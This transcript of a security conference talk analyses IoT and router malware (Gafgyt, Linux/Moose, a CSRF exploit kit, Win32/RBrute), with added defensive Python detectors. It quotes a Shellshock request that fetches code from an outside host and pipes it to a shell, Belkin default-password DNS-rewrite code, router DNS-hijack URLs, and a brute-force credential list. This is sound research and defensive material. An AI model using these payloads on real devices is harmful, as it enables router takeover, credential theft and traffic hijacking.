IoT or Internet of {Things, Threats}
Posted on 25-Dec-2019
TRANSCRIPT
Thomas (@nyx__o): Malware Researcher at ESET, CTF lover, open source contributor
Olivier (@obilodeau): Security Researcher at GoSecure; previously Malware Researcher at ESET; infosec lecturer at ETS University in Montreal; infosec developer, network admin, Linux system admin
Co-founder of Montrehack (hands-on security workshops); founder of NorthSec Hacker Jeopardy
Agenda: About IoT; Lizard Squad; Linux/Moose; Exploit Kit; Win32/RBrute; Conclusion
Why It Matters? Hard to detect; Hard to remediate; Hard to fix; Low hanging fruit for bad guys
A Real Threat: Several cases disclosed in the last two years; A lot of same-old background noise (DDoSers); Things are only getting worse
Wait, is IoT malware really about things?
No. Not yet.
So what kind of malware can we find on such insecure devices?
Lizard Squad
Who are Lizard Squad? Blackhat hacking group; Lots of Distributed Denial of Service (DDoS); DDoS of PlayStation Network and Xbox Live at Christmas 2014; Bomb threats; DDoS for hire (LizardStresser)
"Cyber-rascals!" (headline in French: "Des CYBER-CHENAPANS!")
The Malware: Linux/Gafgyt; Linux/Powbot, Linux/Aidra, Kaiten, …; Probably others, as the source is public
Characteristics: Telnet scanner; Flooding: UDP, TCP, Junk and Hold
Some Server Code:
"*****************************************"
"*       WELCOME TO THE BALLPIT          *"
"*   Now with *refrigerator* support     *"
"*****************************************"
Attack Vectors: Shellshock; SSH credentials brute-force; Telnet credentials brute-force
Example of a Shellshock Attempt
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: () { goo;}; wget -qO- http://o.kei.su/qn | sh > /dev/null 2>&1 &
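The request above is the whole attack: a CGI server exports the User-Agent header as an environment variable, and a vulnerable bash parses the "() {" prologue as a function definition and executes whatever follows "};". The following detector is an added example written for this page, not code from the presenters or from any of the malware families discussed; it reassembles the slide's request as a constructed sample, flags any header carrying the Shellshock prologue, and pulls the dropper URL out of the injected command so it can be blocked. The benign request with braces in its User-Agent is also constructed, to show it is not flagged.

```python
import re

# Shellshock payloads open with the bash function-definition prologue "() {" and
# close the (usually empty) body with "};" before the command the server should run.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;(?P<cmd>.*)")
# URLs inside the injected command are the dropper locations worth blocking.
URL_RE = re.compile(r"https?://[^\s|;&>'\"]+")


def parse_request(raw):
    """Split a raw HTTP request into (request line, {header: value})."""
    lines = [l.rstrip("\r") for l in raw.strip("\r\n").split("\n")]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return lines[0].strip(), headers


def find_shellshock(raw):
    """Return [(header, injected command)] for each header carrying a Shellshock prologue."""
    _, headers = parse_request(raw)
    hits = []
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if m:
            hits.append((name, m.group("cmd").strip()))
    return hits


def dropper_urls(raw):
    """Collect download URLs from every injected command found in the request."""
    urls = []
    for _, cmd in find_shellshock(raw):
        urls.extend(URL_RE.findall(cmd))
    return urls


# The request shown on the slide, reassembled as a constructed sample.
SAMPLE_REQUEST = "\r\n".join([
    "GET /cgi-bin/authLogin.cgi HTTP/1.1",
    "Host: 127.0.0.1",
    "Cache-Control: no-cache",
    "Connection: Keep-Alive",
    "Pragma: no-cache",
    "User-Agent: () { goo;}; wget -qO- http://o.kei.su/qn | sh > /dev/null 2>&1 &",
    "",
])
# Constructed benign request with braces in the User-Agent: must not be flagged.
BENIGN_REQUEST = (
    "GET / HTTP/1.1\r\nHost: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux) {build: 1};\r\n\r\n"
)

if __name__ == "__main__":
    print(find_shellshock(SAMPLE_REQUEST))
    print(dropper_urls(SAMPLE_REQUEST))
```

Scanning only the User-Agent is not enough in practice: any header the CGI gateway copies into the environment (Referer, Cookie, Host, custom headers) is an equally valid carrier, which is why the detector walks every header.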
Other Variants: HTTPS support; CloudFlare protection bypass
Sophisticated? The LizardStresser database was leaked; Passwords in plaintext…
IRC Command and Control
------- Day changed to 08/25/15 -------
09:32 -!- There are 0 users and 2085 invisible on 1 servers
09:32 -!- 42 unknown connection(s)
09:32 -!- 3 channels formed
09:32 -!- I have 2085 clients and 0 servers
09:32 -!- 2085 2119 Current local users 2085, max 2119
09:32 -!- 2085 2119 Current global users 2085, max 2119
Bot Masters
12:56 -!- Topic for #Fazzix: 1k
12:56 -!- Topic set by void <> (Wed Aug 19 09:58:45 2015)
12:56 [Users #Fazzix]
12:56 [~void] [~void_] [@bob1k] [@Fazzix] [ Myutro]
12:56 -!- Irssi: #Fazzix: Total of 5 nicks (4 ops, 0 halfops, 0 voices, 1 normal)
12:56 -!- Channel #Fazzix created Mon Aug 17 03:11:29 2015
12:56 -!- Irssi: Join to #Fazzix was synced in 2 secs
Linux/Moose
Linux/Moose: Discovered in November 2014; Thoroughly analyzed in early 2015; Published a report in late May 2015
Moose DNA, aka Malware description
Hang tight, this is a recap
Linux/Moose… Named after the string "elan" present in the malware executable
Elan…?
The Lotus Elan
Elán, the Slovak rock band (from 1969 and still active)
Network Capabilities: Pivot through firewalls; Home-made NAT traversal; Custom-made proxy service only available to a set of whitelisted IP addresses
Remotely configured generic network sniffer
Attack Vector: Telnet credentials brute force; Wordlist of 304 user/pass entries sent by the server
Compromise Protocol
Anti-Analysis: Statically linked binary stripped of its debugging symbols; Hard-to-reproduce environment required for the malware to operate; Misleading strings (getcool.com)
Moose Herding: The Malware Operation
Via C&C Configuration: The network sniffer was used to steal HTTP cookies. Twitter: twll, twid; Facebook: c_user; Instagram: ds_user_id; Google: SAPISID, APISID; Google Play/Android: LAY_ACTIVE_ACCOUNT; Youtube: LOGIN_INFO
Via Proxy Usage Analysis: Nature of traffic; Protocol; Targeted social networks
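The sniffer only needed the cookie names above because a session cookie sent over plain HTTP is as good as the password. The audit below is an added example for this page, not the Moose sniffer's code or anything from the ESET report: it replays a constructed three-request capture, as a sniffer sitting on the router would see it, and lists every targeted session cookie that travelled in cleartext. The cookie-name table comes from the slide; the capture records, hostnames and cookie values are invented for the example. The HTTPS request is skipped on purpose, which is exactly what made the operators blind once the social networks enforced TLS.

```python
# Session cookie names the Linux/Moose sniffer was configured (via C&C) to
# capture, keyed by the site that sets them; names are taken from the slide.
TARGETED_COOKIES = {
    "twitter.com": {"twll", "twid"},
    "facebook.com": {"c_user"},
    "instagram.com": {"ds_user_id"},
    "google.com": {"SAPISID", "APISID"},
    "play.google.com": {"LAY_ACTIVE_ACCOUNT"},
    "youtube.com": {"LOGIN_INFO"},
}


def parse_headers(raw):
    """Header lines of a raw HTTP request as {name: value}; the request line is skipped."""
    headers = {}
    for line in raw.split("\n")[1:]:
        name, sep, value = line.rstrip("\r").partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


def parse_cookies(header):
    """'a=1; b=2' -> [('a', '1'), ('b', '2')], keeping the order the client sent."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name.strip(), value.strip()))
    return pairs


def targeted_names(host):
    """Union of the cookie names watched for host and for its parent domains."""
    names = set()
    for domain, cookies in TARGETED_COOKIES.items():
        if host == domain or host.endswith("." + domain):
            names |= cookies
    return names


def audit_capture(capture):
    """capture: iterable of (scheme, raw_request). Returns [(host, cookie)] for every
    targeted session cookie a passive sniffer could read, i.e. one sent over plain HTTP."""
    exposed = []
    for scheme, raw in capture:
        if scheme != "http":
            continue  # TLS hides the Cookie header from a sniffer on the router
        headers = parse_headers(raw)
        host = headers.get("Host", "").lower().split(":")[0]
        watched = targeted_names(host)
        for name, _ in parse_cookies(headers.get("Cookie", "")):
            if name in watched:
                exposed.append((host, name))
    return exposed


# Constructed capture: three requests as seen from a compromised router.
CAPTURE = [
    ("http", "GET /home HTTP/1.1\r\nHost: www.facebook.com\r\nCookie: c_user=1234; xs=deadbeef\r\n\r\n"),
    ("https", "GET / HTTP/1.1\r\nHost: twitter.com\r\nCookie: twll=l%3D1; twid=u%3D42\r\n\r\n"),
    ("http", "GET /watch HTTP/1.1\r\nHost: www.youtube.com:80\r\nCookie: PREF=f1; LOGIN_INFO=abc\r\n\r\n"),
]

if __name__ == "__main__":
    for host, cookie in audit_capture(CAPTURE):
        print(f"{cookie} for {host} exposed in cleartext")
```

The same logic, pointed at a real pcap decoded by your favourite dissector, is a quick way to measure how much of a network's session material is still exposed to an on-path device.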
An Example (four screenshot slides; images not included in the transcript)
Anti-Tracking: Proxy access is protected by an IP-based whitelist; So we can't use the proxy service to evaluate the malware population; Blind because of HTTPS enforced on social networks
A Strange Animal: Not in the DDoS or bitcoin mining business; No x86 variant found; Controlled by a single group of actors
Status
Whitepaper Impact: A few weeks after the publication the C&C servers went dark; After a reboot, all affected devices should be cleaned; But victims were compromised via weak credentials, so they can always be reinfected
Alive or dead?
Yay! Except…
Linux/Moose Update: New sample in September; New proxy service port (20012); New C&C selection algorithm; Few differences; Still under scrutiny
Exploit Kit Targeting Routers
Exploit Kit Definition: Automates exploitation; Targets browsers; Common exploits are Adobe and Java
source: Malwarebytes
Exploit Kit in Action (two screenshot slides; images not included in the transcript)
Cross-Site Request Forgery (CSRF): Uses default credentials (HTTP); Changes the primary Domain Name System (DNS) server
Exploit Kit CSRF (page source as shown on the slide, truncated at the right edge):
<html>
<head>
<script type="text/javascript" src
<body>
<iframe id="iframe" sandbox="allow-same-origin"
<script language="javascript">
Exploit Kit How-To (kit code as shown on the slide; exp() and pDNS are defined elsewhere in the kit, and the data string is cut off at the slide's edge):
function e_belkin(ip) {
    var method = "POST";
    var url = "";
    var data = "";
    // Step 1: log in to the Belkin admin interface with the default password.
    url = "http://" + ip + "/cgi-bin/login.exe?pws=admin"
    exp(url, "", "GET");
    // Step 2: rewrite the primary DNS server, one octet per form field.
    url = "http://" + ip + "/cgi-bin/setup_dns.exe";
    data = "dns1_1=" + pDNS.split('.')[0] + "&dns1_2="
    exp(url, data, method);
}
Exploit Kit continually improved: Obfuscation; Exploits for CVEs
Exploit Kit - CVE: CVE-2015-1187 D-Link DIR-636L Remote Command Injection / Incorrect Authentication
Recap Exploit Kit: Changes DNS; Fileless
What Can They Do? Universal XSS on all HTTP sites fetching JavaScript from a 3rd-party domain; Phishing; Ad fraud
You Said Ad fraud? Injection via Google Analytics domain hijacking; JavaScript runs in the context of every page
Example of Google Analytics Substitution (one entry of the injected script's ad-loader table):
'adcash': function() {
    var adcash = document.createElement('script');
    adcash.type = 'text/javascript';
    adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944';
    document.body.appendChild(adcash);
},
Win32/RBrute (cont.): Tries to find administration web pages (IP); Scan and report; Router model is extracted from the realm attribute of the HTTP authentication
Win32/RBrute Targets
$ strings rbrute.exe
[...]
TD-W8901G
TD-W8901GB
TD-W8951ND
TD-W8961ND
TD-8840T
TD-W8961ND
TD-8816
TD-8817
TD-W8151N
TD-W8101G
ZXDSL 831CII
ZXV10 W300
[...]
DSL-2520U
DSL-2600U
DSL router
TD-W8901G
TD-W8901G 3.0
TD-W8901GB
TD-W8951ND
TD-W8961ND
Win32/RBrute Brute force: Logins: admin, support, root & Administrator; Password list retrieved from the CnC
<empty string>
111111
12345
123456
12345678
abc123
admin
Administrator
consumer
dragon
gizmodo
iqrquksm
letmein
lifehack
monkey
password
qwerty
root
soporteETB2006
support
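Both Moose (a 304-entry user/pass list pushed by the server) and RBrute (the short list above, fetched from the C&C) are dictionary attacks, and they look the same from the device side: a burst of failed logins from one source, each trying a login and a password off a known list. The detector below is an added example for this page, not code from the presenters or from either malware; it reads a constructed tab-separated authentication log (the record format is an assumption, modelled on a telnet honeypot export), counts failures per source inside a sliding window, and counts how many attempts used exactly the RBrute logins and passwords from the slide. Source addresses, timestamps and the two non-list passwords are invented.

```python
from datetime import datetime, timedelta

# Logins and passwords from the Win32/RBrute slides (the empty password is part of the list).
RBRUTE_LOGINS = {"admin", "support", "root", "Administrator"}
RBRUTE_PASSWORDS = {
    "", "111111", "12345", "123456", "12345678", "abc123", "admin", "Administrator",
    "consumer", "dragon", "gizmodo", "iqrquksm", "letmein", "lifehack", "monkey",
    "password", "qwerty", "root", "soporteETB2006", "support",
}


def parse_auth_log(lines):
    """Parse tab-separated 'timestamp, source IP, login, password, result' records.
    This record format is an assumption made for the example (e.g. a telnet honeypot export)."""
    events = []
    for line in lines:
        ts, src, login, password, result = line.rstrip("\n").split("\t")
        events.append((datetime.fromisoformat(ts), src, login, password, result))
    return sorted(events)


def detect_bruteforce(lines, max_failures=5, window=timedelta(seconds=60)):
    """Per source IP: failure count, attempts that used RBrute-style credentials,
    whether a login eventually succeeded, and whether the failure rate trips the threshold."""
    per_src = {}
    for ts, src, login, password, result in parse_auth_log(lines):
        entry = per_src.setdefault(src, {"failures": [], "wordlist_hits": 0, "success": False})
        if login in RBRUTE_LOGINS and password in RBRUTE_PASSWORDS:
            entry["wordlist_hits"] += 1
        if result == "ok":
            entry["success"] = True
        else:
            entry["failures"].append(ts)
    report = {}
    for src, entry in per_src.items():
        fails = entry["failures"]
        # Sliding window: any run of max_failures failures inside `window` trips the alarm.
        flagged = any(
            fails[i + max_failures - 1] - fails[i] <= window
            for i in range(len(fails) - max_failures + 1)
        )
        report[src] = {
            "failures": len(fails),
            "wordlist_hits": entry["wordlist_hits"],
            "success": entry["success"],
            "flagged": flagged,
        }
    return report


# Constructed log: one scanner walking the RBrute list until it gets in, and one
# legitimate admin who mistyped a password once. Addresses and times are invented.
SAMPLE_LOG = [
    "2015-08-25T09:32:00\t203.0.113.5\tadmin\t\tfail",
    "2015-08-25T09:32:03\t203.0.113.5\tadmin\tadmin\tfail",
    "2015-08-25T09:32:06\t203.0.113.5\tadmin\t12345\tfail",
    "2015-08-25T09:32:09\t203.0.113.5\troot\troot\tfail",
    "2015-08-25T09:32:12\t203.0.113.5\tsupport\tsupport\tfail",
    "2015-08-25T09:32:15\t203.0.113.5\tadmin\tpassword\tok",
    "2015-08-25T09:40:00\t192.168.1.20\tadmin\tS3cure-Pa55!\tfail",
    "2015-08-25T09:40:20\t192.168.1.20\tadmin\tCorrect-Pa55\tok",
]

if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_LOG).items():
        print(src, info)
```

A source that is both flagged and ends with "success": True is the case worth paging on: the device has been taken, and the prevention the conclusion slide calls simple (a password not on any list, Telnet off) is what would have stopped it.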
Win32/RBrute Changing DNS (request patterns as shown on the slide, the last one cut off at the right edge):
http://<router_IP>/&dnsserver=<malicious_DNS>&dnsserver2=8.8.8.8&Save=Save
http://<router_IP>/dnscfg.cgi?dnsPrimary=<malicious_DNS>
http://<router_IP>/Enable_DNSFollowing=1&dnsPrimary=
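The exploit kit's e_belkin() routine and the RBrute URLs above are the same attack seen from two sides: a GET or POST to the router's LAN address that carries a DNS server in a parameter. Those requests cross the LAN and, where a web proxy or egress logger sees them, they are easy to spot. The scanner below is an added example for this page, not code from the presenters, the exploit kit or RBrute; it serves both the exploit-kit CSRF section and the RBrute section. It reads constructed proxy records in a "timestamp client method url" shape (an assumed format), recognises the setup_dns.exe and dnscfg.cgi endpoints and the dnsPrimary/dnsserver/dns1_x parameters from the slides, recovers RBrute's "/&param=" query that hides in the path, and reports any resolver not on an allow-list. Hosts, clients and the rogue resolver 203.0.113.7 are invented.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Request shapes used to rewrite a router's DNS: the Belkin setup_dns.exe and
# dnscfg.cgi endpoints and the dnsPrimary/dnsserver/dns1_x parameters shown on
# the slides for the exploit kit and Win32/RBrute. Extend per device family.
DNS_PATHS = {"/cgi-bin/setup_dns.exe", "/dnscfg.cgi"}
DNS_PARAMS = {"dnsPrimary", "dnsserver", "dnsserver2", "dns1_1", "dns1_2"}


def split_router_url(url):
    """Return (host, path, params). RBrute sends parameters after '/&' with no '?',
    so a query hidden in the path is recovered as well."""
    parts = urlsplit(url)
    path, query = parts.path, parts.query
    if not query and "&" in path:
        path, _, query = path.partition("&")
    return parts.hostname, path, parse_qs(query, keep_blank_values=True)


def find_dns_changes(log_lines, allowed_dns):
    """Scan 'timestamp client method url' proxy records (a constructed format) for
    requests that set a DNS server on a router. Returns a list of
    (client, router, parameter-or-path, value, suspicious) tuples; a value is
    suspicious when it is not an allow-listed resolver or cannot be parsed as an
    IP address (the per-octet dns1_1 form the kit uses against Belkin devices)."""
    allowed = {ipaddress.ip_address(a) for a in allowed_dns}
    findings = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[3]
        host, path, params = split_router_url(url)
        if host is None:
            continue
        hits = DNS_PARAMS & set(params)
        if not hits and path not in DNS_PATHS:
            continue
        if not hits:
            # Parameters travelled in a POST body the log does not keep; the endpoint alone is a signal.
            findings.append((client, host, path, "", True))
            continue
        for name in sorted(hits):
            for value in params[name]:
                try:
                    suspicious = ipaddress.ip_address(value) not in allowed
                except ValueError:
                    suspicious = True
                findings.append((client, host, name, value, suspicious))
    return findings


def suspicious_only(log_lines, allowed_dns):
    """Just the findings that point at a rogue or unverifiable resolver."""
    return [f for f in find_dns_changes(log_lines, allowed_dns) if f[4]]


# Constructed proxy log: the kit's Belkin sequence (default-password login, then
# setup_dns.exe), a dnscfg.cgi rewrite to a rogue resolver, an RBrute-style
# '/&dnsserver=' request that happens to set legitimate resolvers, and noise.
PROXY_LOG = [
    "1440500000.001 192.168.1.50 GET http://192.168.1.1/cgi-bin/login.exe?pws=admin",
    "1440500000.002 192.168.1.50 POST http://192.168.1.1/cgi-bin/setup_dns.exe",
    "1440500000.003 192.168.1.50 GET http://192.168.1.1/dnscfg.cgi?dnsPrimary=203.0.113.7",
    "1440500000.004 192.168.1.51 GET http://192.168.1.1/&dnsserver=192.168.1.1&dnsserver2=8.8.8.8&Save=Save",
    "1440500000.005 192.168.1.52 GET http://www.example.com/search?q=dns",
]
ALLOWED_RESOLVERS = {"192.168.1.1", "8.8.8.8"}

if __name__ == "__main__":
    for finding in suspicious_only(PROXY_LOG, ALLOWED_RESOLVERS):
        print(finding)
```

The login.exe?pws=admin request on the line before setup_dns.exe is not flagged by itself, but it is the tell that the change came from the kit and not from the owner: a default password in the URL, followed within milliseconds by a DNS write, from a client that is a browser, not the admin's console.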
Win32/RBrute Next Step: Simple redirection to a fake Chrome installer (facebook or google domains); Install (user action required); Change the primary DNS on the computer (via a registry key)
HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{network interface UUID}\NameServer
Why reinfect someone with RBrute and not Sality?
Win32/RBrute In A Coffee Shop
Infected user -> infected router -> everyone is infected
RBrute and Sality
Conclusion: Embedded malware: Not yet complex; Tools and processes need to catch up; A low hanging fruit; Prevention is simple
Thank you! Special thanks to the ESET Canada Research Team
Questions?
@obilodeau @nyx__o
References
http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf
http://malware.dontneedcoffee.com/2015/05/an-exploit-kit-dedicated-to-csrf.html
https://gist.github.com/josephwegner/1d20f1ce1d59b61172e1
http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/